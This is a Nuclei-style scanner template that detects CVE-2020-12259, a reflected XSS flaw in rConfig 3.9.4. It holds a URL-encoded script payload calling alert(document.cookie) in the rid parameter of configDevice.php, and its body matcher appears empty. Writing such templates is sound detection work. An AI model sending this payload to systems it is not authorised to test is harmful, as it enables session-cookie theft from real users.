id: CVE-2020-12259 info: name: rConfig 3.9.4 XSS author: pikpikcu severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259 tags: cve,cve2020,rconfig,xss requests: - method: GET path: - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "" part: body - type: status status: - 200 - type: word part: header words: - "text/html"